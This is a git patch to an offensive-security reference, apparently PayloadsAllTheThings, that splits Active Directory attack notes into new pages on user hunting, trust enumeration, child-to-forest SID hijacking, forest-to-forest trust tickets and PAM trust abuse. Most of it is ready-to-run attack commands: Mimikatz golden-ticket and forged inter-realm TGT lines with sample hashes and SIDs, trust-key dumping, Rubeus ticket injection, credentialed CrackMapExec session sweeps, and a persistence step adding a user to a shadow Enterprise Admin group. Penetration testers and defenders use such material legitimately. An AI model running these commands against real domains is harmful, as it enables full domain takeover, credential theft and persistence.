From 38068dc5a3fd89cb9e7bdd80cbe576f7be3fba38 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 3 Dec 2023 20:54:06 +0100 Subject: [PATCH] AD - Pages v0.6 --- .../Active Directory Attack.md | 181 ------------------ docs/active-directory/ad-adds-enumerate.md | 27 +++ docs/active-directory/trust-pam.md | 40 ++++ docs/active-directory/trust-relationship.md | 42 ++++ docs/active-directory/trust-sid-hijacking.md | 20 ++ docs/active-directory/trust-ticket.md | 37 ++++ 6 files changed, 166 insertions(+), 181 deletions(-) create mode 100644 docs/active-directory/trust-pam.md create mode 100644 docs/active-directory/trust-relationship.md create mode 100644 docs/active-directory/trust-sid-hijacking.md create mode 100644 docs/active-directory/trust-ticket.md diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md index 8b02cb3..595aad6 100644 --- a/docs/active-directory/Active Directory Attack.md +++ b/docs/active-directory/Active Directory Attack.md @@ -1,17 +1,5 @@ # Active Directory Attacks -## Summary - -- [Active Directory Attacks](#active-directory-attacks) - - [Summary](#summary) - - [Tools](#tools) - - [User Hunting](#user-hunting) - - [Trust relationship between domains](#trust-relationship-between-domains) - - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) - - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust) - - [References](#references) - ## Tools * [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) @@ -99,175 +87,6 @@ ``` -## User Hunting - -Sometimes you need to find a machine where a specific user is logged in. -You can remotely query every machines on the network to get a list of the users's sessions. - -* CrackMapExec - ```ps1 - cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions - SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions - SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator - ``` -* Impacket Smbclient - ```ps1 - $ impacket-smbclient Administrator@10.10.10.10 - # who - host: \\10.10.10.10, user: Administrator, active: 1, idle: 0 - ``` -* PowerView Invoke-UserHunter - ```ps1 - # Find computers were a Domain Admin OR a specified user has a session - Invoke-UserHunter - Invoke-UserHunter -GroupName "RDPUsers" - Invoke-UserHunter -Stealth - ``` - -## Trust relationship between domains - -* One-way - * Domain B trusts A - * Users in Domain A can access resources in Domain B - * Users in Domain B cannot access resources in Domain A -* Two-way - * Domain A trusts Domain B - * Domain B trusts Domain A - * Authentication requests can be passed between the two domains in both directions - -### Enumerate trusts between domains - -* Native `nltest` - ```powershell - nltest /trusted_domains - ``` -* PowerShell `GetAllTrustRelationships` - ```powershell - ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() - - SourceName TargetName TrustType TrustDirection - ---------- ---------- --------- -------------- - domainA.local domainB.local TreeRoot Bidirectional - ``` -* Crackmapexec module `enum_trusts` - ```powershell - cme ldap -u -p -M enum_trusts - ``` - -### Exploit trusts between domains - -:warning: Require a Domain-Admin level access to the current domain. - -| Source | Target | Technique to use | Trust relationship | -|---|---|---|---| -| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | -| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | -| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | -| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | - - - -## Child Domain to Forest Compromise - SID Hijacking - -Most trees are linked with dual sided trust relationships to allow for sharing of resources. -By default the first domain created if the Forest Root. - -**Requirements**: -- KRBTGT Hash -- Find the SID of the domain - ```powershell - $ Convert-NameToSid target.domain.com\krbtgt - S-1-5-21-2941561648-383941485-1389968811-502 - - # with Impacket - lookupsid.py domain/user:password@10.10.10.10 - ``` -- Replace 502 with 519 to represent Enterprise Admins -- Create golden ticket and attack parent domain. - ```powershell - kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt - ``` - -## Forest to Forest Compromise - Trust Ticket - -* Require: SID filtering disabled - -From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using -Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. - -### Dumping trust passwords (trust keys) - -> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. - -```powershell -lsadump::trust /patch - -or find the TRUST_NAME$ machine account hash -``` - -### Create a forged trust ticket (inter-realm TGT) using Mimikatz - -```powershell -mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi -mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi -``` - -### Use the Trust Ticket file to get a ST for the targeted service - -```powershell -.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local -.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt -``` - -Inject the ST file and access the targeted service with the spoofed rights. - -```powershell -kirbikator lsa .\ticket.kirbi -ls \\machine.domain.local\c$ -``` - -## Privileged Access Management (PAM) Trust - -> PAM (Privileged access managment) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. - -Requirements: -* Windows Server 2016 or earlier - -If we compromise the bastion we get `Domain Admins` privileges on the other domain - -* Default configuration for PAM Trust - ```ps1 - # execute on our forest - netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes - netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes - netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes - netdom trust lab.local /domain:bastion.local /Quarantine:No - # execute on our bastion - netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes - ``` -* Enumerate PAM trusts - ```ps1 - # Detect if current forest is PAM trust - Import ADModule - Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} - - # Enumerate shadow security principals - Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl - - # Enumerate if current forest is managed by a bastion forest - # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External - Get-ADTrust -Filter {(ForestTransitive -eq $True)} - ``` -* Compromise - * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) - * Using SID History -* Persistence - ```ps1 - # Add a compromised user to the group - Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} - ``` - - ## References * [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index bf61629..0162863 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -264,6 +264,33 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections ``` + +## User Hunting + +Sometimes you need to find a machine where a specific user is logged in. +You can remotely query every machines on the network to get a list of the users's sessions. + +* CrackMapExec + ```ps1 + cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions + SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator + ``` +* Impacket Smbclient + ```ps1 + $ impacket-smbclient Administrator@10.10.10.10 + # who + host: \\10.10.10.10, user: Administrator, active: 1, idle: 0 + ``` +* PowerView Invoke-UserHunter + ```ps1 + # Find computers were a Domain Admin OR a specified user has a session + Invoke-UserHunter + Invoke-UserHunter -GroupName "RDPUsers" + Invoke-UserHunter -Stealth + ``` + + ## Other Interesting Commands - **Find Domain Controllers** diff --git a/docs/active-directory/trust-pam.md b/docs/active-directory/trust-pam.md new file mode 100644 index 0000000..8ada2de --- /dev/null +++ b/docs/active-directory/trust-pam.md @@ -0,0 +1,40 @@ +# Trust - Privileged Access Management + +> PAM (Privileged Access Management) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. + +Requirements: +* Windows Server 2016 or earlier + +If we compromise the bastion we get `Domain Admins` privileges on the other domain + +* Default configuration for PAM Trust + ```ps1 + # execute on our forest + netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes + netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes + netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes + netdom trust lab.local /domain:bastion.local /Quarantine:No + # execute on our bastion + netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes + ``` +* Enumerate PAM trusts + ```ps1 + # Detect if current forest is PAM trust + Import ADModule + Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} + + # Enumerate shadow security principals + Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl + + # Enumerate if current forest is managed by a bastion forest + # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External + Get-ADTrust -Filter {(ForestTransitive -eq $True)} + ``` +* Compromise + * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) + * Using SID History +* Persistence + ```ps1 + # Add a compromised user to the group + Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} + ``` \ No newline at end of file diff --git a/docs/active-directory/trust-relationship.md b/docs/active-directory/trust-relationship.md new file mode 100644 index 0000000..a0069a2 --- /dev/null +++ b/docs/active-directory/trust-relationship.md @@ -0,0 +1,42 @@ +# Trust - Relationship + +* One-way + * Domain B trusts A + * Users in Domain A can access resources in Domain B + * Users in Domain B cannot access resources in Domain A +* Two-way + * Domain A trusts Domain B + * Domain B trusts Domain A + * Authentication requests can be passed between the two domains in both directions + + +## Enumerate trusts between domains + +* Native `nltest` + ```powershell + nltest /trusted_domains + ``` +* PowerShell `GetAllTrustRelationships` + ```powershell + ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() + + SourceName TargetName TrustType TrustDirection + ---------- ---------- --------- -------------- + domainA.local domainB.local TreeRoot Bidirectional + ``` +* Crackmapexec module `enum_trusts` + ```powershell + cme ldap -u -p -M enum_trusts + ``` + + +## Exploit trusts between domains + +:warning: Require a Domain-Admin level access to the current domain. + +| Source | Target | Technique to use | Trust relationship | +|---|---|---|---| +| Root | Child | Golden Ticket + Enterprise Admin group (Mimikatz /groups) | Inter Realm (2-way) | +| Child | Child | SID History exploitation (Mimikatz /sids) | Inter Realm Parent-Child (2-way) | +| Child | Root | SID History exploitation (Mimikatz /sids) | Inter Realm Tree-Root (2-way) | +| Forest A | Forest B | PrinterBug + Unconstrained delegation ? | Inter Realm Forest or External (2-way) | \ No newline at end of file diff --git a/docs/active-directory/trust-sid-hijacking.md b/docs/active-directory/trust-sid-hijacking.md new file mode 100644 index 0000000..a35162e --- /dev/null +++ b/docs/active-directory/trust-sid-hijacking.md @@ -0,0 +1,20 @@ +# Child Domain to Forest Compromise - SID Hijacking + +Most trees are linked with dual sided trust relationships to allow for sharing of resources. +By default the first domain created if the Forest Root. + +**Requirements**: +- KRBTGT Hash +- Find the SID of the domain + ```powershell + $ Convert-NameToSid target.domain.com\krbtgt + S-1-5-21-2941561648-383941485-1389968811-502 + + # with Impacket + lookupsid.py domain/user:password@10.10.10.10 + ``` +- Replace 502 with 519 to represent Enterprise Admins +- Create golden ticket and attack parent domain. + ```powershell + kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt + ``` \ No newline at end of file diff --git a/docs/active-directory/trust-ticket.md b/docs/active-directory/trust-ticket.md new file mode 100644 index 0000000..b7ac42d --- /dev/null +++ b/docs/active-directory/trust-ticket.md @@ -0,0 +1,37 @@ +# Forest to Forest Compromise - Trust Ticket + +* Require: SID filtering disabled + +From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using +Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. + +## Dumping trust passwords (trust keys) + +> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. + +```powershell +lsadump::trust /patch + +or find the TRUST_NAME$ machine account hash +``` + +## Create a forged trust ticket (inter-realm TGT) using Mimikatz + +```powershell +mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi +mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi +``` + +## Use the Trust Ticket file to get a ST for the targeted service + +```powershell +.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local +.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt +``` + +Inject the ST file and access the targeted service with the spoofed rights. + +```powershell +kirbikator lsa .\ticket.kirbi +ls \\machine.domain.local\c$ +``` \ No newline at end of file